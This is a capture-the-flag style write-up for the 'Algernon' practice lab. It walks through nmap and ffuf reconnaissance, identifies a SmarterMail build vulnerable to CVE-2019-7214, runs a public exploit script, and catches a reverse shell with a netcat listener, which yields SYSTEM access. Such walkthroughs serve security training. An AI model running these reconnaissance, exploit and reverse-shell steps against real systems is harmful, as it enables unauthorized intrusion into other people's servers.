PG Practice: Windows - Algernon

Machine Info

Spoiler

This lab demonstrates exploiting a remote code execution vulnerability in SmarterMail build 6985 to gain SYSTEM-level access on a Windows server. Learners will identify the application version, leverage an RCE exploit, and use a reverse shell payload to compromise the target. This lab emphasizes web application exploitation and highlights the risks of unpatched software.

Administrator

Reconnaissance

We are going to start by running our nmap scan:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
ports=$(nmap -p- --min-rate=1000 -T4 $VICTIM | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)


└─$ nmap -p$ports -sC -sV $VICTIM
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 04-29-20  09:31PM       <DIR>          ImapRetrieval
| 03-03-26  08:10AM       <DIR>          Logs
| 04-29-20  09:31PM       <DIR>          PopRetrieval
|_04-29-20  09:32PM       <DIR>          Spool
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-title: IIS Windows
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
5040/tcp  open  unknown
7680/tcp  open  pando-pub?
9998/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| uptime-agent-info: HTTP/1.1 400 Bad Request\x0D
| Content-Type: text/html; charset=us-ascii\x0D
| Server: Microsoft-HTTPAPI/2.0\x0D
| Date: Tue, 03 Mar 2026 16:13:54 GMT\x0D
| Connection: close\x0D
| Content-Length: 326\x0D
| \x0D
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd">\x0D
| <HTML><HEAD><TITLE>Bad Request</TITLE>\x0D
| <META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD>\x0D
| <BODY><h2>Bad Request - Invalid Verb</h2>\x0D
| <hr><p>HTTP Error 400. The request verb is invalid.</p>\x0D
|_</BODY></HTML>\x0D
|_http-server-header: Microsoft-IIS/10.0
| http-title: Site doesn't have a title (text/html; charset=utf-8).
|_Requested resource was /interface/root
17001/tcp open  remoting      MS .NET Remoting services
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 10|2019|7|2008|8.1 (98%)
OS CPE: cpe:/o:microsoft:windows_10 cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8.1
Aggressive OS guesses: Microsoft Windows 10 1909 - 2004 (98%), Microsoft Windows 10 1909 (93%), Microsoft Windows 10 1709 - 21H2 (92%), Microsoft Windows 10 20H2 - 21H1 (90%), Microsoft Windows 10 21H2 (90%), Microsoft Windows Server 2019 (90%), Microsoft Windows 10 20H2 (90%), Microsoft Windows 10 1903 - 21H1 (89%), Microsoft Windows 10 1803 (89%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 or Windows 8.1 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 11s
| smb2-time: 
|   date: 2026-03-03T16:13:55
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

From the services listed ports 9998, 7680 and 17001 seems uncommon. Looking at the web we come across SmarterMail.

Web - SmarterMail

─$ ffuf -u http://$VICTIM:9998/FUZZ -w /usr/share/seclists/Discovery/Web-Content/big.txt -r

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://$VICTIM:9998/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/big.txt
 :: Follow redirects : true
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

Download                [Status: 500, Size: 36, Words: 4, Lines: 1, Duration: 321ms]
Scripts                 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 87ms]
Services                [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 84ms]
api                     [Status: 200, Size: 5199, Words: 261, Lines: 78, Duration: 90ms]
aux                     [Status: 200, Size: 4845, Words: 140, Lines: 82, Duration: 95ms]
com1                    [Status: 200, Size: 4845, Words: 140, Lines: 82, Duration: 82ms]
com2                    [Status: 200, Size: 4845, Words: 140, Lines: 82, Duration: 85ms]
com4                    [Status: 200, Size: 4845, Words: 140, Lines: 82, Duration: 86ms]
com3                    [Status: 200, Size: 4845, Words: 140, Lines: 82, Duration: 87ms]
con                     [Status: 200, Size: 4845, Words: 140, Lines: 82, Duration: 91ms]
download                [Status: 500, Size: 36, Words: 4, Lines: 1, Duration: 88ms]
favicon.ico             [Status: 200, Size: 32038, Words: 13, Lines: 13, Duration: 33ms]
fonts                   [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 95ms]
interface               [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 84ms]
lpt1                    [Status: 200, Size: 4845, Words: 140, Lines: 82, Duration: 85ms]
lpt2                    [Status: 200, Size: 4845, Words: 140, Lines: 82, Duration: 86ms]
nul                     [Status: 200, Size: 4845, Words: 140, Lines: 82, Duration: 96ms]
prn                     [Status: 200, Size: 4845, Words: 140, Lines: 82, Duration: 95ms]
reports                 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 331ms]
scripts                 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 78ms]
services                [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 90ms]
views                   [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 99ms]

Not much from the fuzzing, looking it up online we find possible exploits but we are not sure for the version yet, but looking at details for port 17001 it hints us about CVE-2019-7214.

Tip

We are going to use the above exploit but first we need to add the correct IPs for the remote host and the local host so we can get the reverse shell.

Using the exploit we are able to achieve RCE and get access to SYSTEM.

1
└─$ python 49216.py

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
└─$ rlwrap nc -lnvp 4444
listening on [any] 4444 ...
connect to [$ATTACKER] from (UNKNOWN) [$VICTIM] 49759

PS C:\Windows\system32> cd C:\
PS C:\> ls

    Directory: C:\

Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----        4/29/2020  10:37 PM                inetpub                                                               
d-----        4/24/2020   3:42 AM                PerfLogs                                                              
d-r---         5/2/2022   7:34 AM                Program Files                                                         
d-r---         5/2/2022   7:33 AM                Program Files (x86)                                                   
d-----        4/29/2020  10:31 PM                SmarterMail                                                           
d-r---         3/3/2026   8:11 AM                Users                                                                 
d-----         5/2/2022   7:49 AM                Windows                                                               
-a----         3/3/2026   8:10 AM           2663 output.txt                                                            

PS C:\> whoami
nt authority\system

Machine Info#

Administrator#

Reconnaissance#

Web - SmarterMail#

Machine Info

Administrator

Reconnaissance

Web - SmarterMail